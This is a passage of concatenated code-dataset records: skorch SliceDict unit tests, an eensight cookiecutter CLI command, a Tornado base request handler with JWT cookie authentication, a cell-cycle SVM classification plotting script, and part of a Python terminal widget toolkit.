(dict(a=np.ones((10, 1, 1)), b=np.ones((10, 10)), c=np.ones(10)), 10),\n ])\n def test_len_and_shape(self, sldict_cls, kwargs, expected):\n sldict = sldict_cls(**kwargs)\n assert len(sldict) == expected\n assert sldict.shape == (expected,)\n\n def test_get_item_str_key(self, sldict_cls):\n sldict = sldict_cls(a=np.ones(5), b=np.zeros(5))\n assert (sldict['a'] == np.ones(5)).all()\n assert (sldict['b'] == np.zeros(5)).all()\n\n @pytest.mark.parametrize('sl, expected', [\n (slice(0, 1), {'f0': np.array([0]), 'f1': np.array([[0, 1, 2]])}),\n (slice(1, 2), {'f0': np.array([1]), 'f1': np.array([[3, 4, 5]])}),\n (slice(0, 2), {'f0': np.array([0, 1]),\n 'f1': np.array([[0, 1, 2], [3, 4, 5]])}),\n (slice(0, None), dict(f0=np.arange(4),\n f1=np.arange(12).reshape(4, 3))),\n (slice(-1, None), {'f0': np.array([3]),\n 'f1': np.array([[9, 10, 11]])}),\n (slice(None, None, -1), dict(f0=np.arange(4)[::-1],\n f1=np.arange(12).reshape(4, 3)[::-1])),\n ])\n def test_get_item_slice(self, sldict_cls, sldict, sl, expected):\n sliced = sldict[sl]\n self.assert_dicts_equal(sliced, sldict_cls(**expected))\n\n def test_slice_list(self, sldict, sldict_cls):\n result = sldict[[0, 2]]\n expected = sldict_cls(\n f0=np.array([0, 2]),\n f1=np.array([[0, 1, 2], [6, 7, 8]]))\n self.assert_dicts_equal(result, expected)\n\n def test_slice_mask(self, sldict, sldict_cls):\n result = sldict[np.array([1, 0, 1, 0]).astype(bool)]\n expected = sldict_cls(\n f0=np.array([0, 2]),\n f1=np.array([[0, 1, 2], [6, 7, 8]]))\n self.assert_dicts_equal(result, expected)\n\n def test_slice_int(self, sldict):\n with pytest.raises(ValueError) as exc:\n # pylint: disable=pointless-statement\n sldict[0]\n assert str(exc.value) == 'SliceDict cannot be indexed by integers.'\n\n def test_len_sliced(self, sldict):\n assert len(sldict) == 4\n for i in range(1, 4):\n assert len(sldict[:i]) == i\n\n def test_str_repr(self, sldict, sldict_cls):\n loc = locals().copy()\n loc.update({'array': np.array, 'SliceDict': sldict_cls})\n # pylint: disable=eval-used\n result = eval(str(sldict), globals(), loc)\n self.assert_dicts_equal(result, sldict)\n\n def test_iter_over_keys(self, sldict):\n found_keys = {key for key in sldict}\n expected_keys = {'f0', 'f1'}\n assert found_keys == expected_keys\n\n def test_grid_search_with_dict_works(\n self, sldict_cls, data, classifier_module):\n from sklearn.model_selection import GridSearchCV\n from skorch import NeuralNetClassifier\n\n net = NeuralNetClassifier(classifier_module)\n X, y = data\n X = sldict_cls(X=X)\n params = {\n 'lr': [0.01, 0.02],\n 'max_epochs': [10, 20],\n }\n gs = GridSearchCV(net, params, refit=True, cv=3, scoring='accuracy',\n iid=True)\n gs.fit(X, y)\n print(gs.best_score_, gs.best_params_)\n\n def test_copy(self, sldict, sldict_cls):\n copied = sldict.copy()\n assert copied.shape == sldict.shape\n assert isinstance(copied, sldict_cls)\n\n def test_fromkeys_raises(self, sldict_cls):\n with pytest.raises(TypeError) as exc:\n sldict_cls.fromkeys(['f0', 'f1'])\n\n msg = \"SliceDict does not support fromkeys.\"\n assert exc.value.args[0] == msg\n\n def test_update(self, sldict, sldict_cls):\n copied = sldict.copy()\n copied['f0'] = -copied['f0']\n\n sldict.update(copied)\n assert (sldict['f0'] == copied['f0']).all()\n assert isinstance(sldict, sldict_cls)\n\n def test_equals_arrays(self, sldict):\n copied = sldict.copy()\n copied['f0'] = -copied['f0']\n\n assert copied == copied\n assert not copied == sldict\n assert copied != sldict\n\n def test_equals_arrays_deep(self, sldict):\n copied = 
sldict.copy()\n copied['f0'] = np.array(copied['f0'].copy())\n\n assert copied == copied\n assert copied == sldict\n\n def test_equals_tensors(self, sldict_cls):\n sldict = sldict_cls(\n f0=torch.arange(4),\n f1=torch.arange(12).reshape(4, 3),\n )\n copied = sldict.copy()\n copied['f0'] = -copied['f0']\n\n assert copied == copied\n assert not copied == sldict\n assert copied != sldict\n\n def test_equals_tensors_deep(self, sldict_cls):\n sldict = sldict_cls(\n f0=torch.arange(4),\n f1=torch.arange(12).reshape(4, 3),\n )\n copied = sldict.copy()\n copied['f0'] = copied['f0'].clone()\n\n assert copied == copied\n assert copied == sldict\n\n def test_equals_arrays_tensors_mixed(self, sldict_cls):\n sldict0 = sldict_cls(\n f0=np.arange(4),\n f1=torch.arange(12).reshape(4, 3),\n )\n sldict1 = sldict_cls(\n f0=np.arange(4),\n f1=torch.arange(12).reshape(4, 3),\n )\n\n assert sldict0 == sldict1\n\n sldict1['f0'] = torch.arange(4)\n assert sldict0 != sldict1\n\n def test_equals_different_keys(self, sldict_cls):\n sldict0 = sldict_cls(\n a=np.arange(3),\n )\n sldict1 = sldict_cls(\n a=np.arange(3),\n b=np.arange(3, 6),\n )\n assert sldict0 != sldict1\n\n\nclass TestPredefinedSplit():\n\n @pytest.fixture\n def predefined_split(self):\n from skorch.helper import predefined_split\n return predefined_split\n\n def test_pickle(self, predefined_split, data):\n from skorch.dataset import Dataset\n\n valid_dataset = Dataset(*data)\n train_split = predefined_split(valid_dataset)\n\n # does not raise\n pickle.dumps(train_split)\n","sub_path":"skorch/tests/test_helper.py","file_name":"test_helper.py","file_ext":"py","file_size_in_byte":8842,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"474256972","text":"# -*- coding: utf-8 -*-\n# Adapted from https://github.com/quantumblacklabs/kedro/blob/0.17.5/kedro/framework/cli/starters.py\n\n\nimport importlib.resources\nimport shutil\nfrom pathlib import Path\n\nimport click\nimport yaml\nfrom kedro.framework.cli.starters import _fetch_config_from_user_prompts\nfrom kedro.framework.cli.utils import KedroCliError\n\nimport eensight.templates\n\nDIRECTORY_ARG_HELP = \"\"\"An optional directory inside which the resources repository\nshould reside. 
If no value is provided, the current working directory will be used.\"\"\"\n\n\ndef _clean_pycache(path: Path):\n \"\"\"Recursively clean all __pycache__ folders from `path`.\n Args:\n path: Existing local directory to clean __pycache__ folders from.\n \"\"\"\n to_delete = [each.resolve() for each in path.rglob(\"__pycache__\")]\n\n for each in to_delete:\n shutil.rmtree(each, ignore_errors=True)\n\n\n@click.group(name=\"eensight\")\ndef start_cli():\n pass\n\n\n@start_cli.group()\ndef resources():\n \"\"\"Initialize the eensight resources.\"\"\"\n\n\n@resources.command(\"init\")\n@click.option(\n \"--output-dir\",\n \"-o\",\n type=click.Path(exists=False, file_okay=False),\n default=None,\n help=DIRECTORY_ARG_HELP,\n)\ndef init(output_dir):\n \"\"\"Create a repository for the eensight resources.\"\"\"\n from cookiecutter.generate import generate_context\n from cookiecutter.main import cookiecutter # for performance reasons\n\n with importlib.resources.path(\n eensight.templates, \"cookiecutter.json\"\n ) as cookiecutter_dir:\n cookiecutter_context = generate_context(cookiecutter_dir).get(\n \"cookiecutter\", {}\n )\n cookiecutter_dir = cookiecutter_dir.parent.resolve()\n prompts_yml = cookiecutter_dir / \"prompts.yml\"\n try:\n with prompts_yml.open(\"r\") as prompts_file:\n prompts_required = yaml.safe_load(prompts_file)\n except Exception as exc:\n raise KedroCliError(\n \"Failed to generate resource repository: could not load prompts.yml. \" + str(exc)\n ) from exc\n\n config = _fetch_config_from_user_prompts(prompts_required, cookiecutter_context)\n\n cookiecutter_args = {\n \"output_dir\": output_dir or str(Path.cwd().resolve()),\n \"no_input\": True,\n \"extra_context\": config,\n }\n try:\n resources_path = cookiecutter(\n template=str(cookiecutter_dir), **cookiecutter_args\n )\n except Exception as exc:\n raise KedroCliError(\n \"Failed to generate resource repository when running cookiecutter. 
\"\n + str(exc)\n ) from exc\n\n _clean_pycache(Path(resources_path))\n click.secho(\n f\"\\nResource repository generated in {resources_path}\",\n fg=\"bright_green\",\n )\n","sub_path":"src/eensight/framework/cli/starter.py","file_name":"starter.py","file_ext":"py","file_size_in_byte":2830,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"446472835","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\n\nimport logging\nfrom datetime import datetime, timedelta\n\nfrom ujson import dumps\nfrom tornado.web import RequestHandler\n\nfrom holmes import __version__\nfrom holmes.models import User\nimport holmes.utils as utils\n\n\nclass BaseHandler(RequestHandler):\n\n @property\n def config(self):\n return self.application.config\n\n def initialize(self, *args, **kw):\n self.is_public = kw.pop('is_public', False)\n super(BaseHandler, self).initialize(*args, **kw)\n\n locale = self.get_browser_locale()\n self._ = utils.install_i18n(locale.code)\n self.jwt = utils.Jwt(self.config.SECRET_KEY)\n\n def get_authenticated_user(self):\n authenticated, payload = self.is_authenticated()\n if authenticated:\n user_email = payload['sub']\n user = User.by_email(user_email, self.db)\n return user\n else:\n return None\n\n def validate_superuser(self):\n user = self.get_authenticated_user()\n if not user or not user.is_superuser:\n self.set_unauthorized()\n return False\n return True\n\n def set_unauthorized(self):\n self.set_status(401)\n self.write('Unauthorized')\n self.finish()\n\n def renew_authentication(self, payload):\n payload.update(dict(\n iat=datetime.utcnow(),\n exp=datetime.utcnow() + timedelta(\n seconds=self.config.SESSION_EXPIRATION\n )\n ))\n token = self.jwt.encode(payload)\n self.set_cookie('HOLMES_AUTH_TOKEN', token)\n\n def is_authenticated(self):\n return self.jwt.try_to_decode(self.get_cookie('HOLMES_AUTH_TOKEN'))\n\n def authenticate_request(self):\n authenticated, payload = self.is_authenticated()\n if authenticated:\n self.renew_authentication(payload)\n else:\n self.set_unauthorized()\n\n def prepare(self):\n if self.request.method != 'OPTIONS' and not self.is_public:\n self.authenticate_request()\n\n def log_exception(self, typ, value, tb):\n for handler in self.application.error_handlers:\n handler.handle_exception(\n typ, value, tb, extra={\n 'url': self.request.full_url(),\n 'ip': self.request.remote_ip,\n 'holmes-version': __version__\n }\n )\n\n super(BaseHandler, self).log_exception(typ, value, tb)\n\n def on_finish(self):\n if self.application.config.COMMIT_ON_REQUEST_END:\n if self.get_status() > 399:\n logging.debug('ROLLING BACK TRANSACTION')\n self.db.rollback()\n else:\n logging.debug('COMMITTING TRANSACTION')\n self.db.flush()\n self.db.commit()\n self.application.event_bus.flush()\n\n def options(self, *args):\n self.set_status(200)\n self.finish()\n\n def set_default_headers(self):\n self.set_header(\n 'Access-Control-Allow-Origin',\n self.application.config.HOLMES_WEB_URL\n )\n self.set_header('Access-Control-Allow-Credentials', 'true')\n self.set_header(\n 'Access-Control-Allow-Methods', 'GET,PUT,POST,DELETE,OPTIONS'\n )\n self.set_header('Access-Control-Allow-Headers', 'Accept, Content-Type')\n\n def write_json(self, obj):\n self.set_header(\"Content-Type\", \"application/json\")\n self.write(dumps(obj))\n\n @property\n def cache(self):\n return self.application.cache\n\n @property\n def db(self):\n return self.application.db\n\n @property\n def girl(self):\n return 
self.application.girl\n","sub_path":"holmes/handlers/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":3731,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"26284591","text":"print(__doc__)\nfrom sklearn import preprocessing\nimport matplotlib.pyplot as plt\nimport matplotlib.patches as mpatches\nimport numpy as np\nimport scipy.io as sio\nfrom sklearn import svm, datasets\nimport os\nimport fnmatch\nimport time\nimport pandas as pd\nimport matplotlib.gridspec as gridspec\nfrom sklearn.cluster import KMeans\n\n\ndef make_meshgrid(x, y, h=0.001):\n \"\"\"Create a mesh of points to plot in\n\n Parameters\n ----------\n x: data to base x-axis meshgrid on\n y: data to base y-axis meshgrid on\n h: stepsize for meshgrid, optional\n\n Returns\n -------\n xx, yy : ndarray\n \"\"\"\n x_min, x_max = x.min() - 1, x.max() + 1\n y_min, y_max = y.min() - 1, y.max() + 1\n\n xx, yy = np.meshgrid(np.arange(x_min, x_max, h), np.arange(y_min, y_max, h))\n\n return xx, yy\n\n\ndef plot_contours(ax, clf, xx, yy, **params):\n \"\"\"Plot the decision boundaries for a classifier.\n\n Parameters\n ----------\n ax: matplotlib axes object\n clf: a classifier\n xx: meshgrid ndarray\n yy: meshgrid ndarray\n params: dictionary of params to pass to contourf, optional\n \"\"\"\n Z = clf.predict(np.c_[xx.ravel(), yy.ravel()])\n Z = Z.reshape(xx.shape)\n out = ax.contourf(xx, yy, Z, **params)\n return out\n\n\n\ndef set_class(x):\n if x == 'G1':\n return 1\n elif ('S' in x and 'G1' in x):\n return 2\n elif x == 'S':\n return 4\n elif ('S' in x and 'G2' in x):\n return 3\n elif x == 'G2':\n return 5\n\n else:\n return 0\n\ndef set_color(x):\n if x == 'G1':\n return 'red'\n elif ('S' in x and 'G1' in x):\n return 'yellow'\n elif x == 'S':\n return 'blue'\n elif ('S' in x and 'G2' in x):\n return 'orange'\n elif x == 'G2':\n return 'green'\n else:\n return 'black'\n\n\nclass Cell:\n def __init__(self, totalintensity, area, cellcycle):\n self.totalintensity = int(totalintensity)\n self.area = int(area)\n self.cellcycle = str(cellcycle)\n self.Class = set_class(str(cellcycle))\n\n\n\n\n\n#----------------------------------------START----------------------------------\ncells = []\ncount = 0\njoin=1\ncount_g1=0\ncount_g2=0\n\n#--------------------------------LEGEND-----------------------------------------\n\nG1_patch = mpatches.Patch(color='red', label='G1')\nSG1_patch = mpatches.Patch(color='yellow', label='S/G1')\nS_patch = mpatches.Patch(color='blue', label='S')\nSG2_patch = mpatches.Patch(color='orange', label='S/G2')\nG2_patch = mpatches.Patch(color='green', label='G2')\nError_patch = mpatches.Patch(color='black', label='Invalid Data')\n\n#dir = os.path.dirname(os.path.realpath(__file__))\ndir = os.getcwd()\nfor roots, dirs, files in os.walk(dir):\n for file in files:\n if file.endswith('.mat'):\n path = os.path.realpath(os.path.join(roots,file))\n print(path)\n data = (sio.loadmat(path,struct_as_record=True))['storage']\n for case in data:\n cells.append(Cell(case['TotalIntensity'], case['Area'], case['CellCycle'][0][0]))\n count += 1\n\nprint (count,\" files found\")\n\n\nplt.ioff()\n\nn_figures=1\ntitles=['Area vs Intensity-All']\n\nfor i in range(1,n_figures+1):\n plt.figure(i)\n plt.ylabel('Area')\n plt.xlabel('Intensity')\n plt.title(titles[i-1])\n plt.grid(True)\n plt.legend(handles=[G1_patch,SG1_patch,S_patch,SG2_patch,G2_patch,Error_patch])\n\ncount=0\nfor 
cell in cells:\n color=set_color(cell.cellcycle)\n plt.plot(cell.totalintensity, cell.area, marker = 'o', markersize=3, color=color)\n if color != 'black':\n count += 1\n\nprint (count,\" cells drawn\")\nplt.savefig('dots.png')\nplt.close()\n\n\n#--------------------------------CLASSIFIER-------------------------------------\n\ndfData = pd.DataFrame(columns=['Intensity', 'Area', 'Class'])\ncount=0\nfor cell in cells:\n if cell.Class !=0:\n add=pd.DataFrame({'Intensity':[cell.totalintensity],\n 'Area':[cell.area],\n 'Class':[cell.Class]})\n dfData=dfData.append(add, ignore_index=True)\n\n\nX = dfData[['Intensity', 'Area']]\nX[['Intensity', 'Area']] = preprocessing.scale(dfData[['Intensity', 'Area']])\ny = dfData['Class']\ny=y.astype('int')\n#print(df.to_string())\n\n\n\n\n\nC = 1.0 # SVM regularization parameter\nmodels = (svm.SVC(kernel='linear', C=C),\n KMeans(n_clusters=3, random_state=0),\n svm.SVC(kernel='rbf', gamma=1/2, C=C),\n svm.SVC(kernel='poly', degree=1, C=C))\nmodels = (clf.fit(X, y) for clf in models)\n\n\n# title for the plots\ntitles = ('SVC with linear kernel',\n 'K Means',\n 'SVC with RBF kernel',\n 'SVC with polynomial (degree 1) kernel')\n\n\n\nfig, sub = plt.subplots(3, 2)\nplt.subplots_adjust(wspace=0.4, hspace=0.4)\n\n\nX0, X1 = X.values[:, 0], X.values[:, 1]\nxx, yy = make_meshgrid(X0, X1)\n\n\n\nprint(\"Let's print\\n\")\nfor clf, title, ax in zip(models, titles, sub.flatten()):\n cf=plot_contours(ax, clf, xx, yy, cmap=plt.cm.coolwarm, alpha=0.8)\n ax.scatter(X0, X1, c=y, cmap=plt.cm.coolwarm, s=20, edgecolors='k')\n ax.set_xlim(xx.min(), xx.max())\n ax.set_ylim(yy.min(), yy.max())\n ax.set_xlabel('Intensity')\n ax.set_ylabel('Area')\n ax.set_xticks(())\n ax.set_yticks(())\n ax.set_title(title)\n\n\ngs = gridspec.GridSpec(3, 1)\nax1 = plt.subplot(gs[2, :]) # last row, span all columns\ncf = ax1.scatter(X0, X1, c=y, cmap=plt.cm.get_cmap('coolwarm',3), s=20, edgecolors='k')\nax1.set_xlim(xx.min(), xx.max())\nax1.set_ylim(yy.min(), yy.max())\nax1.set_xlabel(\"Intensity\")\nax1.set_ylabel(\"Area\")\nax1.set_title(\"No Classification\")\ncbar=plt.colorbar(cf, ax=ax1)\ncbar.ax.get_yaxis().set_ticks([])\n\nfor j, lab in enumerate(['G1','G1/S','G2/S']):\n cbar.ax.text(1.5, (2 * j + 1) / 6.0, lab, va='center')\n\n\nprint(\"IM DONE\\n\")\nplt.show()\n\"\"\"\nplt.pause(1)\nplt.figure(2)\nplt.text(0.05, 0.5, 'Click on me to close!', dict(size=30))\nplt.draw()\n\nhappy=True\nwhile happy != False:\n happy = plt.waitforbuttonpress(-1)\n\nplt.close()\n\"\"\"\n","sub_path":"Ignore/classificador.py","file_name":"classificador.py","file_ext":"py","file_size_in_byte":6031,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"50715513","text":"import math\nimport textwrap\n\nimport vtk.styles\nimport vtk.term\nimport vtk.theming\n\nPLACE_DIRECTION_FREE = -1\nPLACE_DIRECTION_NEXT_TO = 0\nPLACE_DIRECTION_UNDER = 1\n\nRESIZE_DIRECTION_WIDTH = 0b00000001\nRESIZE_DIRECTION_HEIGHT = 0b00000010\nRESIZE_DIRECTION_BOTH = RESIZE_DIRECTION_WIDTH | RESIZE_DIRECTION_HEIGHT\n\nclass Event:\n def __init__(self):\n pass\n\nclass KeyPressEvent(Event):\n def __init__(self, key):\n super().__init__()\n\n self.key = key\n\nclass EventListener:\n def __init__(self, event, action):\n self.event = event\n self.action = action\n\nclass Measurement:\n def __init__(self, percentageLength, deltaLength, relativeMeasurement = None):\n self.percentageLength = percentageLength\n self.deltaLength = deltaLength\n self.relativeMeasurement = relativeMeasurement\n \n def measure(self):\n 
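# resolve this measurement to an absolute length: the relative measurement scaled by percentageLength, plus the fixed deltaLength offset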
absoluteMeasurementValue = 0\n\n if self.relativeMeasurement != None:\n absoluteMeasurementValue = math.floor(self.relativeMeasurement.measure() * self.percentageLength)\n \n return absoluteMeasurementValue + self.deltaLength\n\nclass Point:\n def __init__(self, x, y):\n self.x = x\n self.y = y\n\nclass Component:\n def __init__(self, parent):\n self.parent = parent\n self.children = []\n self.eventListeners = []\n \n def place(self):\n self.parent.children.append(self)\n \n def on(self, event, action):\n self.eventListeners.append(EventListener(event, action))\n \n def off(self, event):\n newEventListeners = []\n\n for eventListener in self.eventListeners:\n if eventListener.event != event:\n newEventListeners.append(eventListener)\n \n self.eventListeners = newEventListeners\n \n def handleEvent(self, event):\n for eventListener in self.eventListeners:\n if eventListener.event == type(event):\n eventListener.action(event = event)\n \n def emitEvent(self, event, captured = None, sender = None):\n if sender == None:\n sender = self\n\n self.handleEvent(event)\n\n # only propagate down while capturing and up while bubbling, so an\n # event cannot bounce between parent and children forever\n if captured != False:\n for child in self.children:\n child.emitEvent(event, True, sender)\n\n if captured != True and self.parent != None:\n self.parent.emitEvent(event, False, sender)\n\nclass Application(Component):\n def __init__(self):\n super().__init__(None)\n\n self.running = False\n self.currentFocussedElement = None\n self.x = Measurement(0, 0)\n self.y = Measurement(0, 0)\n self.width = Measurement(0, vtk.term.getTerminalSize()[\"width\"])\n self.height = Measurement(0, vtk.term.getTerminalSize()[\"height\"])\n self.innerWidth = Measurement(0, vtk.term.getTerminalSize()[\"width\"])\n self.innerHeight = Measurement(0, vtk.term.getTerminalSize()[\"height\"])\n self.padding = Measurement(0, 0)\n self.paddingTop = Measurement(0, 0)\n self.paddingBottom = Measurement(0, 0)\n self.paddingLeft = Measurement(0, 0)\n self.paddingRight = Measurement(0, 0)\n \n def _render(self, forceChange = False):\n for child in self.children:\n child._render()\n\n def place(self):\n raise AttributeError(\"Application is the root, and has no parent\")\n\n def start(self):\n self.running = True\n\n try:\n vtk.term.hideCursor()\n\n self._render(True)\n\n forceNextRender = False\n\n while self.running: # Render loop\n self._render(forceNextRender)\n\n forceNextRender = False\n waitingForEvent = True\n\n while waitingForEvent: # Event loop\n try:\n keyPressed = vtk.term.getKey()\n\n if keyPressed != None:\n if self.currentFocussedElement != None:\n self.currentFocussedElement.emitEvent(KeyPressEvent(keyPressed))\n\n waitingForEvent = False\n except:\n vtk.term.write(vtk.styles.Style_Reset()._render())\n vtk.term.clearScreen()\n vtk.term.moveCursorTo(0, 0)\n vtk.term.showCursor()\n\n self.running = False\n waitingForEvent = False\n \n if self.width.measure() != vtk.term.getTerminalSize()[\"width\"] or self.height.measure() != vtk.term.getTerminalSize()[\"height\"]:\n self.width = Measurement(0, vtk.term.getTerminalSize()[\"width\"])\n self.height = Measurement(0, vtk.term.getTerminalSize()[\"height\"])\n\n waitingForEvent = False\n forceNextRender = True\n except Exception as e:\n vtk.term.write(vtk.styles.Style_Reset()._render())\n vtk.term.clearScreen()\n vtk.term.moveCursorTo(0, 0)\n vtk.term.showCursor()\n\n # TODO: Add more info for errors\n if type(e) != KeyboardInterrupt:\n print(e)\n\nclass Widget(Component):\n def __init__(self, parent):\n super().__init__(parent)\n\n self._hasChanges = False\n self._x = Measurement(0, 0, self.parent.innerWidth)\n self._y = Measurement(0, 0, self.parent.innerHeight)\n self._width = 
Measurement(1, 0, self.parent.innerWidth)\n self._height = Measurement(1, 0, self.parent.innerHeight)\n self._paddingTop = Measurement(0, 0, self.parent.innerHeight)\n self._paddingBottom = Measurement(0, 0, self.parent.innerHeight)\n self._paddingLeft = Measurement(0, 0, self.parent.innerWidth)\n self._paddingRight = Measurement(0, 0, self.parent.innerWidth)\n self._backgroundColour = vtk.theming.backgroundColour\n self._foregroundColour = vtk.theming.foregroundColour\n\n def _render(self):\n for child in self.children:\n if self._hasChanges:\n child._hasChanges = True\n\n child._render()\n \n def place(self, placeDirection = PLACE_DIRECTION_NEXT_TO, placeMargin = Measurement(0, 1)):\n if len(self.parent.children) > 0:\n if placeDirection == PLACE_DIRECTION_NEXT_TO:\n self.x = Measurement(0, self.parent.children[-1].x.measure() + self.parent.children[-1].width.measure() + placeMargin.measure())\n self.y = Measurement(0, self.parent.children[-1].y.measure())\n\n if self.getAbsolutePosition().x + self.width.measure() > vtk.term.getTerminalSize()[\"width\"]:\n self.x = 0\n self.y = Measurement(0, self.parent.children[-1].y.measure() + self.parent.children[-1].height.measure() + placeMargin.measure())\n elif placeDirection == PLACE_DIRECTION_UNDER:\n self.x = 0\n self.y = Measurement(0, self.parent.children[-1].y.measure() + self.parent.children[-1].height.measure() + placeMargin.measure())\n\n super().place()\n \n def resizeToContent(self, resizeDirection = RESIZE_DIRECTION_BOTH):\n if resizeDirection & RESIZE_DIRECTION_WIDTH:\n furthestObject = 0\n\n for child in self.children:\n if child.x.measure() + child.width.measure() > furthestObject:\n furthestObject = child.x.measure() + child.width.measure()\n \n self.innerWidth = furthestObject\n \n if resizeDirection & RESIZE_DIRECTION_HEIGHT:\n furthestObject = 0\n\n for child in self.children:\n if child.y.measure() + child.height.measure() > furthestObject:\n furthestObject = child.y.measure() + child.height.measure()\n \n self.innerHeight = furthestObject\n\n @property\n def x(self):\n return self._x\n \n @x.setter\n def x(self, value):\n self._hasChanges = True\n\n if type(value) == Measurement:\n self._x = value\n else:\n if value >= 0:\n self._x = Measurement(0, value, self.parent.innerWidth)\n else:\n self._x = Measurement(1, value, self.parent.innerWidth)\n \n @property\n def y(self):\n return self._y\n \n @y.setter\n def y(self, value):\n self._hasChanges = True\n\n if type(value) == Measurement:\n self._y = value\n else:\n if value >= 0:\n self._y = Measurement(0, value, self.parent.innerHeight)\n else:\n self._y = Measurement(1, value, self.parent.innerHeight)\n \n @property\n def width(self):\n return self._width\n \n @width.setter\n def width(self, value):\n self._hasChanges = True\n\n if type(value) == Measurement:\n self._width = value\n else:\n self._width = Measurement(0, value, self.parent.innerWidth)\n \n @property\n def height(self):\n return self._height\n \n @height.setter\n def height(self, value):\n self._hasChanges = True\n\n if type(value) == Measurement:\n self._height = value\n else:\n self._height = Measurement(0, value, self.parent.innerHeight)\n\n @property\n def innerWidth(self):\n return Measurement(0, self.width.measure() - self.paddingLeft.measure() - self.paddingRight.measure(), self.parent.innerWidth)\n \n @innerWidth.setter\n def innerWidth(self, value):\n self._hasChanges = True\n\n if type(value) == Measurement:\n self._width = Measurement(0, value.measure() - self.paddingLeft.measure() - 
self.paddingRight.measure(), self.parent.innerWidth)\n else:\n self._width = Measurement(0, value - self.paddingLeft.measure() - self.paddingRight.measure(), self.parent.innerWidth)\n\n @property\n def innerHeight(self):\n return Measurement(0, self.height.measure() - self.paddingTop.measure() - self.paddingBottom.measure(), self.parent.innerHeight)\n \n @innerHeight.setter\n def innerHeight(self, value):\n self._hasChanges = True\n\n if type(value) == Measurement:\n self._height = Measurement(0, value.measure() - self.paddingTop.measure() - self.paddingBottom.measure(), self.parent.innerHeight)\n else:\n self._height = Measurement(0, value - self.paddingTop.measure() - self.paddingBottom.measure(), self.parent.innerHeight)\n\n @property\n def padding(self):\n return Measurement(0, max(self._paddingTop.measure(), self._paddingBottom.measure(), self._paddingLeft.measure(), self._paddingRight.measure()))\n \n @padding.setter\n def padding(self, value):\n self._hasChanges = True\n\n padding = 0\n\n if type(value) == Measurement:\n padding = value\n else:\n padding = Measurement(0, value, self.parent.padding)\n\n self._paddingTop = padding\n self._paddingBottom = padding\n self._paddingLeft = padding\n self._paddingRight = padding\n \n @property\n def paddingTop(self):\n return self._paddingTop\n\n @paddingTop.setter\n def paddingTop(self, value):\n self._hasChanges = True\n\n if type(value) == Measurement:\n self._paddingTop = value\n else:\n self._paddingTop = Measurement(0, value, self.parent.paddingTop)\n \n @property\n def paddingBottom(self):\n return self._paddingBottom\n \n @paddingBottom.setter\n def paddingTop(self, value):\n self._hasChanges = True\n\n if type(value) == Measurement:\n self._paddingBottom = value\n else:\n self._paddingBottom = Measurement(0, value, self.parent.paddingBottom)\n\n @property\n def paddingLeft(self):\n return self._paddingLeft\n \n @paddingLeft.setter\n def paddingLeft(self, value):\n self._hasChanges = True\n\n if type(value) == Measurement:\n self._paddingLeft = value\n else:\n self._paddingLeft = Measurement(0, value, self.parent.paddingLeft)\n\n @property\n def paddingRight(self):\n return self._paddingRight\n\n @paddingRight.setter\n def paddingRight(self, value):\n self._hasChanges = True\n\n if type(value) == Measurement:\n self._paddingRight = value\n else:\n self._paddingRight = Measurement(0, value, self.parent.paddingRight)\n\n @property\n def backgroundColour(self):\n return self._backgroundColour\n \n @backgroundColour.setter\n def backgroundColour(self, value):\n self._hasChanges = True\n self._backgroundColour = value\n \n @property\n def foregroundColour(self):\n return self._foregroundColour\n \n @foregroundColour.setter\n def foregroundColour(self, value):\n self._hasChanges = True\n self._foregroundColour = value\n\n def getAbsolutePosition(self):\n absoluteX = 0\n absoluteY = 0\n currentElement = self\n\n while type(currentElement) != Application:\n if currentElement == self:\n absoluteX += currentElement.x.measure()\n absoluteY += currentElement.y.measure()\n else:\n absoluteX += currentElement.x.measure() + currentElement.paddingLeft.measure()\n absoluteY += currentElement.y.measure() + currentElement.paddingTop.measure()\n\n currentElement = currentElement.parent\n \n return Point(absoluteX, absoluteY)\n\nclass Screen(Widget):\n def __init__(self, parent):\n super().__init__(parent)\n\n self.padding = 1\n\n def _render(self):\n vtk.term.write(\n vtk.styles.Style_Reset()._render() +\n self.backgroundColour._render(False) +\n 
self.foregroundColour._render(True)\n )\n vtk.term.clearScreen()\n vtk.term.moveCursorTo(0, 0)\n\n super()._render()\n\nclass Box(Widget):\n def _render(self): \n for i in range(0, self.height.measure()):\n vtk.term.moveCursorTo(self.getAbsolutePosition().x, self.getAbsolutePosition().y + i)\n vtk.term.write(\n self.backgroundColour._render(False) +\n self.foregroundColour._render(True) +\n \" \" * self.width.measure()\n )\n \n super()._render()\n \nclass Label(Box):\n def __init__(self, parent, text = \"\"):\n super().__init__(parent)\n\n self.backgroundColour = vtk.styles.Colour_Transparent()\n self.text = text\n\n self.resizeToContent()\n\n def resizeToContent(self, resizeDirection = RESIZE_DIRECTION_HEIGHT):\n if resizeDirection & RESIZE_DIRECTION_WIDTH:\n unwrappedTextLines = self.text.split(\"\\n\")\n longestTextLineLength = 0\n\n for line in unwrappedTextLines:\n if len(line) > longestTextLineLength:\n longestTextLineLength = len(line)\n\n self.innerWidth = longestTextLineLength\n\n if resizeDirection & RESIZE_DIRECTION_HEIGHT:\n textWrapper = textwrap.TextWrapper(width = self.innerWidth.measure())\n wrappedTextLines = textWrapper.wrap(text = self.text)\n\n self.innerHeight = len(wrappedTextLines)\n\n def _render(self):\n super()._render()\n\n textWrapper = textwrap.TextWrapper(width = self.innerWidth.measure())\n wrappedTextLines = textWrapper.wrap(text = self.text)\n\n for i in range(0, min(len(wrappedTextLines), self.innerHeight.measure())):\n vtk.term.moveCursorTo(self.getAbsolutePosition().x + self.paddingLeft.measure(), self.getAbsolutePosition().y + self.paddingTop.measure() + i)\n vtk.term.write(\n self.backgroundColour._render(False) +\n self.foregroundColour._render(True) +\n wrappedTextLines[i]\n )\n\nclass Button(Label):\n def __init__(self, parent, text = \"\"):\n super().__init__(parent)\n\n self.backgroundColour = vtk.theming.buttonBackgroundColour\n self.foregroundColour = vtk.theming.buttonForegroundColour\n self.text = text\n\n self.resizeToContent(resizeDirection = RESIZE_DIRECTION_BOTH)\n \n def _render(self):\n super()._render()\n\n 